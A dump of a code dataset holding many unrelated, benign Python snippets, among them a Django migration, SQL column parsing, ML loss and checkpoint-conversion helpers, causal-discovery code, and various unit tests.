code stringlengths 281 23.7M |
|---|
class Migration(migrations.Migration):
    # Adds multi-site support to Project: an `on_site` CurrentSiteManager next
    # to the default manager, plus a required FK to sites.Site. default=1
    # backfills existing rows with the first Site; preserve_default=False
    # drops that default again after the migration.

    dependencies = [('sites', '0002_alter_domain_unique'), ('projects', '0026_django2')]

    operations = [migrations.AlterModelManagers(name='project', managers=[('objects', django.db.models.manager.Manager()), ('on_site', django.contrib.sites.managers.CurrentSiteManager())]), migrations.AddField(model_name='project', name='site', field=models.ForeignKey(default=1, help_text='The site this view belongs to (in a multi site setup).', on_delete=django.db.models.deletion.CASCADE, to='sites.Site', verbose_name='Site'), preserve_default=False)]
def parse_col(toks, start_idx, tables_with_alias, schema, default_tables=None):
    """Resolve the column token at toks[start_idx] into 'table.column' form.

    Mutates *toks* (rewrites the token in place) and *schema* (records the
    column under its table). Returns the index just past the consumed token.
    A bare '*' is passed through untouched. Unqualified columns are attributed
    to the single default table, or fuzzy-matched when several are given.
    """
    tok = toks[start_idx]
    if tok == '*':
        return start_idx + 1

    if '.' in tok:
        # Token is alias-qualified: translate the alias to its real table name.
        alias, col = tok.split('.')
        table = tables_with_alias[alias]
        schema.setdefault(table, []).append(col)
        toks[start_idx] = '{}.{}'.format(table, col)
        return start_idx + 1

    assert default_tables is not None and len(default_tables) > 0, 'Default tables should not be None or empty'

    def pick_table(candidates, token):
        # Fuzzy-match the bare column token against the candidate table names.
        return process.extractOne(token.lower(), [t.lower() for t in candidates])[0]

    table = default_tables[0] if len(default_tables) == 1 else pick_table(default_tables, tok)
    schema.setdefault(table, []).append(tok)
    toks[start_idx] = '{}.{}'.format(table, tok)
    return start_idx + 1
def get_criterion(p):
    """Instantiate the training loss selected by p['criterion'].

    Supported values: 'simclr', 'scan', 'confidence-cross-entropy'.
    Imports are done lazily per branch so only the needed loss is loaded.
    Raises ValueError for any other criterion name.
    """
    name = p['criterion']
    if name == 'simclr':
        from losses.losses import SimCLRLoss
        return SimCLRLoss(**p['criterion_kwargs'])
    if name == 'scan':
        from losses.losses import SCANLoss
        return SCANLoss(**p['criterion_kwargs'])
    if name == 'confidence-cross-entropy':
        from losses.losses import ConfidenceBasedCE
        return ConfidenceBasedCE(p['confidence_threshold'], p['criterion_kwargs']['apply_class_balancing'])
    raise ValueError('Invalid criterion {}'.format(name))
def change_yolov6m():
    """Remap YOLOv6-m checkpoint keys from the named-module layout
    (backbone.stem / ERBlock_* / neck Rep_* layers) onto the flat sequential
    index layout expected by the YAML-defined model, then save the remapped
    checkpoint to weights/yolov6m_yaml.pt.

    Relies on a module-level ``ckpt`` holding the loaded source checkpoint.
    The original implementation repeated the same three-line rename for every
    sub-module; the tables below encode the identical mapping.
    """
    # ERBlock_<n>: sub-module index -> flat sequential index (same prefix kept).
    er_block_index = {
        'ERBlock_2': {'0': '1', '1': '2'},
        'ERBlock_3': {'0': '3', '1': '4'},
        'ERBlock_4': {'0': '5', '1': '6'},
        'ERBlock_5': {'0': '7', '1': '8', '2': '9'},
    }
    # Neck modules: moved under 'backbone' with a flat index.
    neck_index = {
        'Rep_p4': '13', 'Rep_p3': '17', 'Rep_n3': '20', 'Rep_n4': '23',
        'reduce_layer0': '10', 'upsample0': '11',
        'reduce_layer1': '14', 'upsample1': '15',
        'downsample2': '18', 'downsample1': '21',
    }
    state_dict = OrderedDict()
    for key, weight in ckpt['model'].state_dict().items():
        parts = key.split('.')
        if parts[1] == 'stem':
            parts[1] = '0'
            new_key = '.'.join(parts)
        elif parts[1] in er_block_index:
            sub_map = er_block_index[parts[1]]
            if parts[2] in sub_map:
                new_key = '.'.join([parts[0], sub_map[parts[2]]] + parts[3:])
            else:
                # Unmapped sub-module index: original code left the key empty,
                # collapsing such entries onto state_dict[''] -- kept for parity.
                new_key = ''
        elif parts[1] in neck_index:
            new_key = '.'.join(['backbone', neck_index[parts[1]]] + parts[2:])
        else:
            # Anything unrecognised keeps its original key (e.g. head weights).
            new_key = key
        state_dict[new_key] = weight
        print(f'Convert {key} to {new_key}')
    checkpoint = {'model': state_dict}
    torch.save(checkpoint, 'weights/yolov6m_yaml.pt')
class Meta:
    """Strips a JSON:API-style envelope ('meta', 'links', 'included') off a
    payload dict and lets callers look resources up in the 'included' section.
    """

    def __init__(self, data):
        # pop() deliberately mutates the caller's dict, removing envelope keys.
        self._meta = data.pop('meta', {})
        self._links = data.pop('links', {})
        self._included = data.pop('included', {})

    def retrieve(self, data):
        """Return the first 'included' resource whose id matches data['id'];
        fall back to *data* itself when nothing is included or no id matches.
        """
        if not self._included:
            return data
        return next((item for item in self._included if item['id'] == data['id']), data)
def test_run_step_groups_none_groups():
    """run_step_groups must reject groups=None with a descriptive ValueError."""
    expected = 'you must specify which step-groups you want to run. groups is None.'
    runner = StepsRunner(get_valid_test_pipeline(), Context())
    with pytest.raises(ValueError) as err:
        runner.run_step_groups(groups=None,
                               success_group='arb success',
                               failure_group='arb fail')
    assert str(err.value) == expected
def calc_loss(output, y, z_r):
    # Masked mean-squared error: per-image sum of squared differences between
    # `output` and target `y`, counted only where the boolean mask `z_r` is
    # True, normalised by the number of valid pixels, then averaged over the
    # batch.
    # NOTE(review): assumes module-level IMAGE_HEIGHT/IMAGE_WIDTH constants and
    # that output/y/z_r share a (batch, H, W[, 1]) shape -- confirm at call sites.
    y_masked = tf.where(z_r, y, (0 * tf.ones_like(y)))
    y_masked_flat_refined = tf.reshape(y_masked, [(- 1), (IMAGE_HEIGHT * IMAGE_WIDTH)])
    o_masked = tf.where(z_r, output, (0 * tf.ones_like(y)))
    o_masked_flat_refined = tf.reshape(o_masked, [(- 1), (IMAGE_HEIGHT * IMAGE_WIDTH)])
    # Per-image count of valid (unmasked) pixels, used as the normaliser.
    mask_one_refined = tf.where(z_r, tf.ones_like(y), (0 * tf.ones_like(y)))
    mask_one_flat_refined = tf.reshape(mask_one_refined, [(- 1), (IMAGE_HEIGHT * IMAGE_WIDTH)])
    numOfPix = tf.reduce_sum(mask_one_flat_refined, 1)
    d = tf.subtract(o_masked_flat_refined, y_masked_flat_refined)
    d_sum = tf.reduce_sum(tf.square(d), 1)
    # SSE / valid-pixel count per image, then the mean over the batch.
    cost = tf.reduce_mean(tf.truediv(d_sum, numOfPix))
    return cost
class OpenIdStore(BaseOpenIDStore):
    # python-openid store backed by a python-social-auth strategy: OpenID
    # associations and nonces are persisted through the strategy's storage
    # classes instead of openid's own file/SQL stores.

    def __init__(self, strategy):
        super().__init__()
        self.strategy = strategy
        self.storage = strategy.storage
        self.assoc = self.storage.association
        self.nonce = self.storage.nonce
        self.max_nonce_age = ((6 * 60) * 60)  # six hours, in seconds

    def storeAssociation(self, server_url, association):
        """Persist an OpenID association for *server_url*."""
        self.assoc.store(server_url, association)

    def removeAssociation(self, server_url, handle):
        """Delete every stored association matching *server_url*/*handle*."""
        associations_ids = list(dict(self.assoc.oids(server_url, handle)).keys())
        if associations_ids:
            self.assoc.remove(associations_ids)

    def expiresIn(self, assoc):
        # Stored associations may be real python-openid objects (getExpiresIn)
        # or plain records exposing an expiresIn attribute.
        if hasattr(assoc, 'getExpiresIn'):
            return assoc.getExpiresIn()
        else:
            return assoc.expiresIn

    def getAssociation(self, server_url, handle=None):
        """Return the first unexpired association for *server_url* (or None),
        pruning associations whose lifetime has reached exactly zero."""
        (associations, expired) = ([], [])
        for (assoc_id, association) in self.assoc.oids(server_url, handle):
            expires = self.expiresIn(association)
            if (expires > 0):
                associations.append(association)
            elif (expires == 0):
                expired.append(assoc_id)
        if expired:
            self.assoc.remove(expired)
        if associations:
            return associations[0]

    def useNonce(self, server_url, timestamp, salt):
        """Accept a nonce exactly once; reject timestamps outside +/- SKEW.

        NOTE(review): SKEW is a module-level constant not visible in this
        chunk -- presumably the openid nonce skew, confirm in the module.
        """
        if (abs((timestamp - time.time())) > SKEW):
            return False
        return self.nonce.use(server_url, timestamp, salt)
class TestAssert(TestNameCheckVisitorBase):
    # Static-analysis tests: the nested `capybara` functions are never called;
    # the framework inspects them for diagnostics.
    # NOTE(review): the bare `_passes()` calls below look like decorators that
    # lost their `@` (and possibly a name prefix, e.g. `@assert_passes()`)
    # during extraction -- confirm against the original suite.

    _passes()
    def test_assert_never_fails(self):
        def capybara():
            # Asserting a non-empty tuple is always true (a classic lint target).
            tpl = ('this', "doesn't", 'work')
            assert tpl

    _passes()
    def test_assert_bad_bool(self):
        class X(object):
            def __bool__(self):
                raise Exception('I am a poorly behaved object')
            __nonzero__ = __bool__  # Python 2 alias for truthiness

        x = X()

        def capybara():
            # Truth-testing x raises; the checker should tolerate/flag this.
            assert x
@unittest.skipIf(not torch.cuda.is_available(), 'test requires a GPU')
class TestGradientScalingAMP(unittest.TestCase):
    """One optimizer step under torch.cuda.amp: checks the half-precision loss,
    the unscaled gradient norm, the updated parameters, and the GradScaler's
    growth behaviour.

    NOTE(review): the skipIf decorator was reconstructed from a stray
    `(not torch.cuda.is_available(), 'test requires a GPU')` tuple that had
    lost its `@unittest.skipIf` prefix -- confirm against the original suite.
    """

    def setUp(self):
        self.x = torch.tensor([2.0]).cuda().half()
        weight = 3.0
        bias = 5.0
        self.error = 1.0
        # Target is off by exactly self.error, so the L1 loss is known a priori.
        self.target = torch.tensor([(((self.x * weight) + bias) + self.error)]).cuda()
        self.loss_fn = torch.nn.L1Loss()
        self.model = torch.nn.Linear(1, 1)
        self.model.weight.data = torch.tensor([[weight]])
        self.model.bias.data = torch.tensor([bias])
        self.model.cuda()
        self.params = list(self.model.parameters())
        self.namespace_dls = argparse.Namespace(optimizer='adam', lr=[0.1], adam_betas='(0.9, 0.999)', adam_eps=1e-08, weight_decay=0.0, threshold_loss_scale=1, min_loss_scale=0.0001)
        # growth_interval=1: a single successful step doubles the loss scale.
        self.scaler = GradScaler(init_scale=1, growth_interval=1)

    def run_iter(self, model, params, optimizer):
        optimizer.zero_grad()
        with autocast():
            y = model(self.x)
            loss = self.loss_fn(y, self.target)
        self.scaler.scale(loss).backward()
        self.assertEqual(loss, torch.tensor(1.0, device='cuda:0', dtype=torch.float16))
        # Unscale before clipping so the norm is measured on true gradients.
        self.scaler.unscale_(optimizer)
        grad_norm = optimizer.clip_grad_norm(0)
        self.assertAlmostEqual(grad_norm.item(), 2.2361, 4)
        self.scaler.step(optimizer)
        self.scaler.update()
        self.assertEqual(model.weight, torch.tensor([[3.1]], device='cuda:0', requires_grad=True))
        self.assertEqual(model.bias, torch.tensor([5.1], device='cuda:0', requires_grad=True))
        self.assertEqual(self.scaler.get_scale(), 2.0)

    def test_automatic_mixed_precision(self):
        model = copy.deepcopy(self.model)
        params = list(model.parameters())
        optimizer = build_optimizer(self.namespace_dls, params)
        self.run_iter(model, params, optimizer)
@when('I set the section start type to {start_type}')
def when_I_set_the_section_start_type_to_start_type(context: Context, start_type: str):
    """Behave step: translate the placeholder text to a WD_SECTION member (or
    None) and assign it to the section under test.

    NOTE(review): the @when decorator was reconstructed from a stray bare
    string literal that had lost its `@when(...)` wrapper -- confirm against
    the original feature steps file.
    """
    new_start_type = {
        'None': None,
        'CONTINUOUS': WD_SECTION.CONTINUOUS,
        'EVEN_PAGE': WD_SECTION.EVEN_PAGE,
        'NEW_COLUMN': WD_SECTION.NEW_COLUMN,
        'NEW_PAGE': WD_SECTION.NEW_PAGE,
        'ODD_PAGE': WD_SECTION.ODD_PAGE,
    }[start_type]
    context.section.start_type = new_start_type
@pytest.fixture(scope='function')
def backend(request, backend_name, xephyr, wayland_session):
    """Yield the display backend selected by *backend_name*: an XBackend bound
    to the Xephyr display, or a WaylandBackend on the test Wayland session.

    (The `@pytest.fixture` decorator was reconstructed from a stray
    `(scope='function')` left behind by formatting loss.)
    """
    if backend_name == 'x11':
        from test.backend.x11.conftest import XBackend
        yield XBackend({'DISPLAY': xephyr.display}, args=[xephyr.display])
    elif backend_name == 'wayland':
        from test.backend.wayland.conftest import WaylandBackend
        yield WaylandBackend(wayland_session)
def load_single_data(task, train_lines):
    """Group raw TSV dataset lines by label for a single GLUE-style task.

    Returns {label: [example, ...]} where an example is
    [text, task, label] for single-sentence tasks and
    [sent1, sent2, task, label] for sentence-pair tasks.
    Relies on module-level get_label()/get_text() helpers.
    Implicitly returns None for unrecognised task names.
    """
    if (task in ['SST-2', 'mr', 'cr']):
        # Single-sentence classification tasks.
        label_list = {}
        for line in train_lines:
            label = get_label(task, line)
            label = str(label)
            text = get_text(task, line)
            if (label not in label_list):
                label_list[label] = [[text.replace('\t', ' '), task, label]]
            else:
                label_list[label].append([text.replace('\t', ' '), task, label])
        return label_list
    if (task in ['MNLI', 'SNLI']):
        # NLI pair tasks; the sentence columns differ between the two layouts.
        label_list = {}
        for line in train_lines:
            label = get_label(task, line)
            line_list = line.strip().split('\t')
            if (task == 'MNLI'):
                (sent1, sent2) = (line_list[8].replace('\t', ' '), line_list[9].replace('\t', ' '))
            else:
                (sent1, sent2) = (line_list[7].replace('\t', ' '), line_list[8].replace('\t', ' '))
            # Normalise the dataset's literal 'n/a' placeholder.
            if (sent1 == 'n/a'):
                sent1 = 'None'
            if (sent2 == 'n/a'):
                sent2 = 'None'
            if (label not in label_list):
                label_list[label] = [[sent1, sent2, task, label]]
            else:
                label_list[label].append([sent1, sent2, task, label])
        return label_list
    if (task in ['MRPC', 'QQP']):
        # Paraphrase pair tasks, indexed from the end of the row.
        label_list = {}
        for line in train_lines:
            label = get_label(task, line)
            line_list = line.strip().split('\t')
            if (task == 'MRPC'):
                # NOTE(review): MRPC takes columns (-1, -2) while QQP takes
                # (-2, -3), i.e. the sentence order is reversed relative to the
                # file's column order -- confirm this is intentional.
                (sent1, sent2) = (line_list[(- 1)].replace('\t', ' '), line_list[(- 2)].replace('\t', ' '))
            else:
                (sent1, sent2) = (line_list[(- 2)].replace('\t', ' '), line_list[(- 3)].replace('\t', ' '))
            if (label not in label_list):
                label_list[label] = [[sent1, sent2, task, label]]
            else:
                label_list[label].append([sent1, sent2, task, label])
        return label_list
def fas(data: ndarray, nodes: List[Node], independence_test_method: CIT_Base, alpha: float=0.05, knowledge: (BackgroundKnowledge | None)=None, depth: int=(- 1), verbose: bool=False, stable: bool=True, show_progress: bool=True) -> Tuple[(GeneralGraph, Dict[(Tuple[(int, int)], Set[int])], Dict[(Tuple[(int, int, Set[int])], float)])]:
    """Fast Adjacency Search (FAS): skeleton discovery for constraint-based
    causal search.

    Starting from a complete graph over *nodes*, an edge x--y is removed when
    some conditioning set S drawn from the neighbours of x (|S| equal to the
    current depth) renders x and y conditionally independent at level *alpha*.
    The depth grows until it exceeds the maximum node degree or *depth*
    (-1 means unlimited). With stable=True (PC-stable) removals are deferred
    to the end of each depth level so the result does not depend on the order
    nodes are visited.

    Returns (skeleton graph, separating sets keyed by ordered node pair,
    p-values keyed by (x, y, S)).
    """
    # --- argument validation -------------------------------------------------
    if (type(data) != np.ndarray):
        raise TypeError("'data' must be 'np.ndarray' type!")
    if (not all((isinstance(node, Node) for node in nodes))):
        raise TypeError("'nodes' must be 'List[Node]' type!")
    if (not isinstance(independence_test_method, CIT_Base)):
        raise TypeError("'independence_test_method' must be 'CIT_Base' type!")
    if ((type(alpha) != float) or (alpha <= 0) or (alpha >= 1)):
        raise TypeError("'alpha' must be 'float' type and between 0 and 1!")
    if ((knowledge is not None) and (type(knowledge) != BackgroundKnowledge)):
        raise TypeError("'knowledge' must be 'BackgroundKnowledge' type!")
    if ((type(depth) != int) or (depth < (- 1))):
        raise TypeError("'depth' must be 'int' type >= -1!")
    if (depth == (- 1)):
        depth = float('inf')  # -1 means "no depth limit"
    # --- initialise the complete graph and bookkeeping -----------------------
    no_of_var = data.shape[1]
    node_names = [node.get_name() for node in nodes]
    cg = CausalGraph(no_of_var, node_names)
    cg.set_ind_test(independence_test_method)
    sep_sets: Dict[(Tuple[(int, int)], Set[int])] = {}
    test_results: Dict[(Tuple[(int, int, Set[int])], float)] = {}

    def remove_if_exists(x: int, y: int) -> None:
        # Remove the edge x--y if it is still present in the working graph.
        edge = cg.G.get_edge(cg.G.nodes[x], cg.G.nodes[y])
        if (edge is not None):
            cg.G.remove_edge(edge)

    var_range = (tqdm(range(no_of_var), leave=True) if show_progress else range(no_of_var))
    current_depth: int = (- 1)
    while (((cg.max_degree() - 1) > current_depth) and (current_depth < depth)):
        current_depth += 1
        edge_removal = set()  # deferred removals for the stable (order-independent) variant
        for x in var_range:
            if show_progress:
                var_range.set_description(f'Depth={current_depth}, working on node {x}')
                var_range.update()
            Neigh_x = cg.neighbors(x)
            if (len(Neigh_x) < (current_depth - 1)):
                continue  # not enough neighbours to form a conditioning set
            for y in Neigh_x:
                sepsets = set()
                if ((knowledge is not None) and knowledge.is_forbidden(cg.G.nodes[x], cg.G.nodes[y]) and knowledge.is_forbidden(cg.G.nodes[y], cg.G.nodes[x])):
                    # Edge forbidden in both directions: drop it without testing.
                    if (not stable):
                        remove_if_exists(x, y)
                        remove_if_exists(y, x)
                        append_value(cg.sepset, x, y, ())
                        append_value(cg.sepset, y, x, ())
                        sep_sets[(x, y)] = set()
                        sep_sets[(y, x)] = set()
                        break
                    else:
                        edge_removal.add((x, y))
                        edge_removal.add((y, x))
                # Candidate conditioning sets: neighbours of x excluding y.
                Neigh_x_noy = np.delete(Neigh_x, np.where((Neigh_x == y)))
                for S in combinations(Neigh_x_noy, current_depth):
                    p = cg.ci_test(x, y, S)
                    test_results[(x, y, S)] = p
                    if (p > alpha):
                        # x independent of y given S: remove edge now or defer.
                        if verbose:
                            print(('%d ind %d | %s with p-value %f\n' % (x, y, S, p)))
                        if (not stable):
                            remove_if_exists(x, y)
                            remove_if_exists(y, x)
                            append_value(cg.sepset, x, y, S)
                            append_value(cg.sepset, y, x, S)
                            sep_sets[(x, y)] = set(S)
                            sep_sets[(y, x)] = set(S)
                            break
                        else:
                            edge_removal.add((x, y))
                            edge_removal.add((y, x))
                            # Accumulate all separating variables seen for (x, y).
                            for s in S:
                                sepsets.add(s)
                    elif verbose:
                        print(('%d dep %d | %s with p-value %f\n' % (x, y, S, p)))
                append_value(cg.sepset, x, y, tuple(sepsets))
                append_value(cg.sepset, y, x, tuple(sepsets))
        # Stable variant: apply all removals collected at this depth at once.
        for (x, y) in edge_removal:
            remove_if_exists(x, y)
            if (cg.sepset[(x, y)] is not None):
                # Flatten the recorded tuples of separating sets into one set.
                origin_set = set((l_in for l_out in cg.sepset[(x, y)] for l_in in l_out))
                sep_sets[(x, y)] = origin_set
                sep_sets[(y, x)] = origin_set
    return (cg.G, sep_sets, test_results)
@uses(web_fixture=WebFixture)
class ResultScenarios(Fixture):
    """Scenarios covering the MethodResult variants (JSON, widget HTML,
    widget-as-JSON): each scenario sets the result object, the value a remote
    method returns, and the response/charset/content-type expectations.

    NOTE(review): the `@uses(web_fixture=WebFixture)` and `@stubclass(Widget)`
    decorators were reconstructed from stray `(web_fixture=WebFixture)` /
    `(Widget)` residue left by formatting loss; the scenario methods likely
    also carried `@scenario` decorators -- confirm against the original suite.
    """

    def json(self):
        # JSON result: an integer payload serialised as '1'.
        self.method_result = JsonResult(IntegerField(), catch_exception=Exception)
        self.value_to_return = 1
        self.expected_response = '1'
        self.exception_response = '"exception text"'
        self.expected_charset = self.method_result.encoding
        self.expected_content_type = 'application/json'
        self.results_match = (lambda x, y: (x == y))

    @stubclass(Widget)
    class WidgetStub(Widget):
        css_id = 'someid'

        def render_contents(self):
            return '<the widget contents>'

        def get_contents_js(self, context=None):
            # Duplicate entries on purpose: the result must de-duplicate them.
            return ['some', 'some', 'javascript']

    def widget(self):
        # Plain widget result: HTML plus its (de-duplicated) inline javascript.
        self.method_result = WidgetResult([self.WidgetStub(self.web_fixture.view)], as_json_and_result=False)
        self.value_to_return = 'ignored in this case'
        self.expected_response = '<the widget contents><script type="text/javascript">javascriptsome</script>'
        self.exception_response = Exception
        self.expected_charset = self.method_result.encoding
        self.expected_content_type = 'text/html'
        self.results_match = (lambda x, y: (x == y))

    def widget_as_json(self):
        # Widget rendered into a JSON envelope keyed by its css_id.
        self.method_result = WidgetResult([self.WidgetStub(self.web_fixture.view)])
        [self.web_fixture.view.page] = self.method_result.result_widgets
        self.value_to_return = 'ignored in this case'
        self.expected_response = {'result': {'someid': '<the widget contents><script type="text/javascript">javascriptsome</script>'}, 'success': True, 'exception': ''}
        self.expected_charset = self.method_result.encoding
        self.expected_content_type = 'application/json'

        def results_match(expected, actual):
            return (json.loads(actual) == expected)
        self.results_match = results_match
def test_cell_n3(mesh=([9] * 3)):
    """Build a diamond-lattice carbon cell (two C atoms, GTH-SZV basis and
    GTH-PADE pseudopotential) with the given FFT mesh, and return it built.
    """
    cell = pbcgto.Cell()
    cell.unit = 'A'  # lattice/atom coordinates in Angstrom
    cell.atom = 'C 0., 0., 0.; C 0.8917, 0.8917, 0.8917'
    cell.a = '0. 1.7834 1.7834\n 1.7834 0. 1.7834\n 1.7834 1.7834 0. '
    cell.basis = 'gth-szv'
    cell.pseudo = 'gth-pade'
    cell.mesh = mesh
    cell.output = '/dev/null'  # silence build output
    cell.build()
    return cell
def _warn_on_old_setuptools(_version: str=setuptools.__version__) -> None:
if (int(_version.split('.')[0]) < 61):
warnings.warn(RuntimeWarning(f'''
ERROR: setuptools=={_version} is used in combination with setuptools_scm>=8.x
Your build configuration is incomplete and previously worked by accident!
setuptools_scm requires setuptools>=61
Suggested workaround if applicable:
- migrating from the deprecated setup_requires mechanism to pep517/518
and using a pyproject.toml to declare build dependencies
which are reliably pre-installed before running the build tools
''')) |
class NestedDict:
    """Builds a dict-of-dicts while parsing TOML-style dotted keys."""

    def __init__(self) -> None:
        # Root container; nests are created lazily as keys are walked.
        self.dict: Dict[str, Any] = {}

    def get_or_create_nest(self, key: "Key", *, access_lists: bool = True) -> dict:
        """Walk *key*, creating empty dicts along the way; return the final nest.

        When *access_lists* is true, a list met on the path is entered at its
        last element (array-of-tables semantics). Raises KeyError if the path
        ends on something that is not a dict.
        """
        node: Any = self.dict
        for part in key:
            if part not in node:
                node[part] = {}
            node = node[part]
            if access_lists and isinstance(node, list):
                node = node[(- 1)]
        if not isinstance(node, dict):
            raise KeyError('There is no nest behind this key')
        return node

    def append_nest_to_list(self, key: "Key") -> None:
        """Append a fresh {} to the list at *key*, creating the list if absent.

        Raises KeyError when the key already holds a non-list value.
        """
        parent = self.get_or_create_nest(key[:(- 1)])
        leaf = key[(- 1)]
        if leaf not in parent:
            parent[leaf] = [{}]
            return
        existing = parent[leaf]
        try:
            existing.append({})
        except AttributeError:
            raise KeyError('An object other than list found behind this key')
def raises_exc(exc: Union[(Type[E], E)], func: Callable[([], Any)], *, match: Optional[str]=None) -> E:
    """Assert that calling *func* raises *exc*.

    *exc* may be an exception type or an exemplar instance; for an instance
    the raised exception's repr (via _repr_value) must match the exemplar's.
    Returns the raised exception for further inspection.
    """
    if isinstance(exc, type):
        expected_type = exc
    else:
        expected_type = type(exc)
    with pytest.raises(expected_type, match=match) as caught:
        func()
    assert _repr_value(caught.value) == _repr_value(exc)
    return caught.value
class TestDraw():
    # Tests for pm.draw(): output shapes for scalar/multivariate variables,
    # drawing several variables at once, fresh randomness per call, and
    # pass-through of compile kwargs to the underlying pytensor function.

    def test_univariate(self):
        with pm.Model():
            x = pm.Normal('x')
            # A single draw of a scalar RV is a 0-d array.
            x_draws = pm.draw(x)
            assert (x_draws.shape == ())
            (x_draws,) = pm.draw([x])
            assert (x_draws.shape == ())
            # draws=n prepends a draw dimension.
            x_draws = pm.draw(x, draws=10)
            assert (x_draws.shape == (10,))
            (x_draws,) = pm.draw([x], draws=10)
            assert (x_draws.shape == (10,))

    def test_multivariate(self):
        with pm.Model():
            mln = pm.Multinomial('mln', n=5, p=np.array([0.25, 0.25, 0.25, 0.25]))
            # draws=1 squeezes the draw dimension, leaving the core shape (4,).
            mln_draws = pm.draw(mln, draws=1)
            assert (mln_draws.shape == (4,))
            (mln_draws,) = pm.draw([mln], draws=1)
            assert (mln_draws.shape == (4,))
            mln_draws = pm.draw(mln, draws=10)
            assert (mln_draws.shape == (10, 4))
            (mln_draws,) = pm.draw([mln], draws=10)
            assert (mln_draws.shape == (10, 4))

    def test_multiple_variables(self):
        with pm.Model():
            x = pm.Normal('x')
            y = pm.Normal('y', shape=10)
            z = pm.Uniform('z', shape=5)
            w = pm.Dirichlet('w', a=[1, 1, 1])
            num_draws = 100
            # Drawing a sequence returns one array per variable, draw-dim first.
            draws = pm.draw((x, y, z, w), draws=num_draws)
            assert (draws[0].shape == (num_draws,))
            assert (draws[1].shape == (num_draws, 10))
            assert (draws[2].shape == (num_draws, 5))
            assert (draws[3].shape == (num_draws, 3))

    def test_draw_different_samples(self):
        with pm.Model():
            x = pm.Normal('x')
            # Consecutive calls must not reuse the same random stream state.
            x_draws_1 = pm.draw(x, 100)
            x_draws_2 = pm.draw(x, 100)
            assert (not np.all(np.isclose(x_draws_1, x_draws_2)))

    def test_draw_pytensor_function_kwargs(self):
        # mode/updates must reach the compiled function: the shared counter
        # increments per draw, so draws equal 0..4.
        sharedvar = pytensor.shared(0)
        x = pm.DiracDelta.dist(0.0)
        y = (x + sharedvar)
        draws = pm.draw(y, draws=5, mode=Mode('py'), updates={sharedvar: (sharedvar + 1)})
        assert np.all((draws == np.arange(5)))
@pytest.mark.parametrize(('widget_field', 'field_name'), [('show_boss_life', 'show_boss_lifebar'), ('show_enemy_life', 'show_enemy_life'), ('show_enemy_damage', 'show_enemy_damage'), ('show_player_damage', 'show_player_damage'), ('show_death_counter', 'show_death_counter'), ('enable_auto_tracker', 'enable_auto_tracker')])
def test_certain_field(skip_qtbot: pytestqt.qtbot.QtBot, widget_field: str, field_name: str) -> None:
    """Clicking each cosmetic-patch checkbox must flip its backing field from
    False to True in the dialog's resulting DreadCosmeticPatches.

    (The decorator was reconstructed: the source had a bare `.parametrize(...)`
    that had lost its `@pytest.mark` prefix.)
    """
    cosmetic_patches = DreadCosmeticPatches(**{field_name: False})
    dialog = DreadCosmeticPatchesDialog(None, cosmetic_patches)
    skip_qtbot.addWidget(dialog)
    # Toggle the checkbox widget that backs `field_name`.
    skip_qtbot.mouseClick(getattr(dialog, widget_field), QtCore.Qt.MouseButton.LeftButton)
    assert (dialog.cosmetic_patches == DreadCosmeticPatches(**{field_name: True}))
def compatible_platforms(provided, required):
    """Return True if a distribution built for platform *provided* can run on
    platform *required*.

    Identical or missing platform strings are trivially compatible. Only macOS
    gets special treatment: a build for an older 10.x minor works on a newer
    one (same major and architecture), and legacy darwin-style strings map
    onto 10.3 / 10.4.
    """
    if (provided is None) or (required is None) or (provided == required):
        return True  # trivially compatible
    req_mac = macosVersionString.match(required)
    if not req_mac:
        return False  # differing non-macOS platforms never match here
    prov_mac = macosVersionString.match(provided)
    if not prov_mac:
        # Legacy "darwinX" provided string: darwin 7 ~ 10.3, darwin 8 ~ 10.4.
        prov_darwin = darwinVersionString.match(provided)
        if prov_darwin:
            dversion = int(prov_darwin.group(1))
            macosversion = ('%s.%s' % (req_mac.group(1), req_mac.group(2)))
            if ((dversion == 7) and (macosversion >= '10.3')) or ((dversion == 8) and (macosversion >= '10.4')):
                return True
        return False
    # Same major version and machine architecture required...
    if (prov_mac.group(1) != req_mac.group(1)) or (prov_mac.group(3) != req_mac.group(3)):
        return False
    # ...and the build's minor version must not exceed the target's.
    return int(prov_mac.group(2)) <= int(req_mac.group(2))
def setUpModule():
    """Build the shared He2 test cell and converged UHF / KUHF references used
    by the tests in this module (stored in module globals)."""
    global cell, mf, kmf, kpts
    cell = pgto.Cell()
    cell.atom = '\n He 0 0 1\n He 1 0 1\n '
    cell.basis = '321g'
    cell.a = (np.eye(3) * 3)  # 3x3x3 Angstrom cubic lattice
    cell.mesh = ([8] * 3)
    cell.verbose = 7
    cell.output = '/dev/null'  # keep the verbose SCF log out of test output
    cell.spin = 2  # two unpaired electrons (triplet)
    cell.build()
    nk = [2, 2, 1]
    kpts = cell.make_kpts(nk, wrap_around=True)
    # k-point and Gamma-point unrestricted HF references, tightly converged.
    kmf = pscf.KUHF(cell, kpts).run(conv_tol=1e-08)
    mf = pscf.UHF(cell).run(conv_tol=1e-08)
class ServerHost(abc.ABC):
    """Interface the contrib server expects its hosting environment to provide.

    Concrete hosts must supply everything except trusted_users(), which has a
    safe empty default. (The source had four `def` lines with no bodies --
    presumably mangled abstract stubs; `raise NotImplementedError` bodies were
    restored to make the class well-formed.)
    """

    def port(self) -> int:
        """TCP port the server should listen on."""
        raise NotImplementedError

    def contrib_auth_token(self) -> str:
        """Token used to authenticate contrib API calls."""
        raise NotImplementedError

    def contrib_secret(self) -> str:
        """Shared secret for the contrib service."""
        raise NotImplementedError

    def user_agent(self) -> Optional[str]:
        """User-agent string for outbound requests, or None for a default."""
        raise NotImplementedError

    def log_exception(self, exc: BaseException) -> None:
        """Record an unexpected exception."""
        raise NotImplementedError

    def log(self, message: str) -> None:
        """Record a diagnostic message."""
        raise NotImplementedError

    def trusted_users(self) -> AbstractSet[str]:
        """Users granted elevated access; empty by default."""
        return frozenset()
def _registerBuiltinFunctions():
    """Register the stock optimizers and LR schedulers in the registries.

    Raises ImportError when apex (needed for the FusedLAMB optimizer) is not
    installed. The original used a bare ``except:`` which also swallowed
    KeyboardInterrupt/SystemExit and hid the real failure; narrowed to
    ImportError and chained with ``from err``.
    """
    try:
        import apex
    except ImportError as err:
        raise ImportError('`import apex` failed. Apex not installed.') from err
    OptimizerRegistry.register('Lamb')(apex.optimizers.FusedLAMB)
    OptimizerRegistry.register('Adam')(torch.optim.Adam)
    LrSchedulerRegistry.register('ReduceLROnPlateau')(torch.optim.lr_scheduler.ReduceLROnPlateau)
    LrSchedulerRegistry.register('Exponential')(torch.optim.lr_scheduler.ExponentialLR)
